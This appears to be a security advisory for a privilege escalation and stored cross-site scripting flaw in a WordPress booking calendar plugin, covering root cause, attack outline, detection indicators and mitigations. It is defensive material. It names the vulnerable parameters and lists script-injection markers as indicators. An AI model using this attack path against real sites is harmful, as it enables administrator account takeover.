CVE-2016-20070: WordPress Booking Calendar Privilege Escalation

CVE-2016-20070 Overview

CVE-2016-20070 affects the WordPress Booking Calendar Contact Form plugin version 1.0.23. The plugin contains two distinct flaws: a privilege escalation issue that allows low-privileged users to modify plugin options, and stored cross-site scripting [CWE-79]. Authenticated users with subscriber-level accounts can inject JavaScript payloads through parameters such as price, name, calendar_language, and email_confirmation_to_user. The malicious scripts execute in administrator browsers when an admin views the affected plugin pages.

Critical Impact

Authenticated subscribers can inject stored JavaScript that runs in administrator sessions, enabling account takeover of WordPress sites running the vulnerable plugin.

Affected Products

• WordPress Booking Calendar Contact Form plugin version 1.0.23
• WordPress installations with the plugin installed and active
• Sites permitting subscriber-level user registration

Discovery Timeline

• 2026-06-15 - CVE-2016-20070 published to NVD
• 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2016-20070

Vulnerability Analysis

The plugin exposes administrative actions through admin-ajax.php and admin.php endpoints without verifying caller privileges. Any authenticated WordPress user, including subscribers, can invoke these handlers and modify plugin configuration values. The handlers also fail to sanitize input parameters before storing them in the WordPress database.

When an administrator subsequently loads the plugin settings or booking pages, the stored attacker-controlled values render in the HTML response without proper output encoding. This produces stored cross-site scripting that executes with administrator privileges.

The weakness is categorized under [CWE-79] (Improper Neutralization of Input During Web Page Generation). EPSS data places exploitation likelihood at 0.231% with a percentile near 13.7, reflecting a niche but documented exploit path. A public exploit is documented in Exploit-DB #39423.

Root Cause

The plugin lacks two controls. First, capability checks such as current_user_can() are missing from privileged AJAX actions, breaking WordPress role separation. Second, input parameters are written to persistent storage and reflected back to administrators without sanitization through functions like sanitize_text_field() or escaping via esc_html().

Attack Vector

An attacker first registers or obtains a subscriber-level account on the target WordPress site. The attacker then sends a crafted POST request to the vulnerable admin-ajax.php or admin.php endpoint, supplying a JavaScript payload in parameters such as price, name, calendar_language, or email_confirmation_to_user. The payload is stored server-side and triggers when an administrator browses the plugin interface, allowing session theft or administrative actions on behalf of the victim. Technical exploitation details are available in the VulnCheck Advisory on XSS.

Detection Methods for CVE-2016-20070

Indicators of Compromise

• POST requests to admin-ajax.php or admin.php from subscriber accounts containing <script>, onerror=, or javascript: substrings in parameter values
• Plugin option records in the wp_options table containing HTML tags or script payloads
• Unexpected modifications to Booking Calendar Contact Form configuration by non-administrator users
• New administrator accounts or modified user roles following plugin interaction

Detection Strategies

• Inspect WordPress access logs for requests to plugin AJAX actions originating from low-privileged authenticated sessions
• Search plugin-managed database rows for HTML or JavaScript content in fields such as price, name, and calendar_language
• Deploy a web application firewall ruleset that flags script-like content in parameters posted to WordPress admin endpoints

Monitoring Recommendations

• Enable WordPress audit logging to capture option changes and the user role that initiated them
• Alert on subscriber accounts issuing POST requests to admin endpoints, which is uncommon in normal usage
• Monitor administrator browser sessions for outbound requests to unknown domains shortly after viewing plugin pages

How to Mitigate CVE-2016-20070

Immediate Actions Required

• Update the Booking Calendar Contact Form plugin to a version later than 1.0.23 or remove it if no fixed version is in use
• Disable open user registration or restrict the subscriber role until the plugin is patched or removed
• Audit existing plugin option values and remove any entries containing HTML or JavaScript content
• Review administrator accounts for unauthorized additions or privilege changes

Patch Information

Refer to the vendor page at the WordPress Resource Page for the latest plugin release. Verify the installed version against the current release and apply the update through the WordPress plugin manager.

Workarounds

• Deactivate the Booking Calendar Contact Form plugin until an updated version is installed
• Block requests to plugin AJAX actions from non-administrator users at the web application firewall layer
• Set users_can_register to false in WordPress general settings to prevent attacker account creation
• Apply a Content Security Policy that disallows inline script execution on wp-admin pages to reduce XSS impact